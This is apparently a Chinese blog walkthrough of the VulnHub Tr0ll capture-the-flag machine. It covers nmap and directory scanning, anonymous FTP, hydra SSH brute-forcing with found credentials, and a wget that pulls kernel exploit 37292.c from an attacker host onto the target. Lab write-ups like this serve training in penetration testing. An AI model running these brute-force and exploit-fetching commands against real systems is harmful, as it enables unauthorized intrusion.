vulnhub-Tr0ll ssh爆破、wireshark流量分析,exp、尋找flag。思維導圖帶你清晰拿到所以flag
1、主機發現
arp-scan -l
2、端口掃描
nmap?-sS?-sV?192.168.66.185
nmap?-sS?-A?-T4?-p-?192.168.66.185
nmap?--script=vuln?192.168.66.185
經典掃描三件套,詳細、簡略包括歷史漏洞都掃描一下
PORT???STATE?SERVICE?VERSION
21/tcp?open??ftp?????vsftpd?3.0.2
ftp-anon:?Anonymous?FTP?login?allowed?(FTP?code?230)22/tcp?open??ssh?????OpenSSH?6.6.1p1?Ubuntu?2ubuntu2?(Ubuntu?Linux;?protocol?2.0)80/tcp?open??http????Apache?httpd?2.4.7?((Ubuntu))這里一個匿名訪問,我們登錄看看什么情況
賬號:anonymous 這里有個文件我們下載下來是一個pcap文件,我們看看是什么情況
這里找到了一些文字,沒懂,是讓我們找這個東西吧
我們去看看80端口
有點抽象的,源代碼什么也沒有,估計是其他文件了
爺笑了,好像在耍我
3、目錄掃描
gobuster?dir?-u?http://192.168.66.187:80?-t30?-w?/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
dirsearch?-u?http://192.168.66.187:80/?-e?*?-i?200
nikto?-h?192.168.66.187?-p?80
4、尋找突破口
我們根據pacp文件里面觀察到他好像開了一個監聽
這里有一種思路就是跟著pacp文件走,就是他干了什么我們跟著做或許有收獲,當然是因為80端口沒信息,可能是兔子窩
這里像敲門啊,這么多端口
這里后來看了wp次啊知道,這東西是訪問端口,前四位是ip,第五位乘256加上第六位就是訪問的端口
這里其實我們早就找到了這個東西,哪就嘗試爆破或者ssh之類的嘗試一下
這里我們把這個目錄下文件下載下來可以執行,然后多出了一個目錄,我們再次訪問
兩個文件夾,我們看看有什么信息
因該是ssh賬戶,一會兒hydra爆一下
這里是密碼,爆破一下吧
hydra?-L?1.txt?-P?/usr/share/wordlists/rockyou.txt?192.168.66.187?ssh
這里可以更改一下字典了,因為他都給我們寫出來了hydra?-L?user.txt?-P?passwd.txt?192.168.66.187?ssh
爺笑了,他說絕對不是gen哪個密碼,靶機最怕這個,誰知道藏了什么東西
賬戶: maleus ps-aux felux Eagle11 genphlux < -- Definitely not this one usmc8892 blawrg wytshadow vis1t0r overflow
密碼: Good_job_:)
這里給爺整笑了,說是包含密碼,結果密碼是Pass.txt
5、ssh連接
連接一下ssh ssh overflow@192.168.66.187
查看系統內核和版本信息
uname -a lsb_release -a
6、尋找exp
查看一下如何使用
我們先把這個exp傳輸到靶機中
wget http://192.168.66.129/37292.c
這張圖片是一個wp中的寫的,這種圖片確實思路更清晰,下次我也要試試這種思維導圖
絲滑小連招拿下flag 后續我也會出更多打靶文章,希望大家關注!謝謝